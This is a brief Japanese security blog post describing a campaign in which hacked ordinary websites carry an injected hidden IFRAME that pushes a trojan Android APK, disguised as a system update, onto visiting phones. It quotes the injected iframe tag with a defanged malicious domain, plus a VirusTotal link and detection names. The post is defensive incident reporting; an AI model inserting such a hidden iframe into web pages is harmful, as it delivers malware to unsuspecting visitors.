Androidマルウェア自動ダウンロード「androidczad info」改ざん被害
たくさんの改ざんされた普通の一般サイトに不正なIFRAMEタグが第三者によって挿入され、アクセスしてきたユーザーが仮にAndroid端末だと、トロイの木馬なAPKファイルが端末に自動ダウンロードされてしまう手口。
・ gaoanalitics info サイト改ざん 約3,000件 2012年5月
その新しい攻撃を日本の一般サイトで確認。
</html>
<iframe style="visibility: hidden; display: none; display: none;" src = "http // androidczad[.]info/"></iframe>
ダウンロードされたアプリ (update.apk) は、ユーザー手動でインストールしない限り感染状態とはならないということで、前回はアプリ名「com.Security.Update」を名乗ってたようですが、今回もイヤらしく「com.Android.Fixed.Update」となってます。もう先週から攻撃が始まってたみたい。
> www.virustotal.com/file/594035f1eb02b5e109c84d50f94403943bae8d73d1d9ccc4fce5542a2168cb25/analysis/1341907100/
- Android:NotCom-A (avast!)
- Android.Proxy.1.origin (Dr.Web)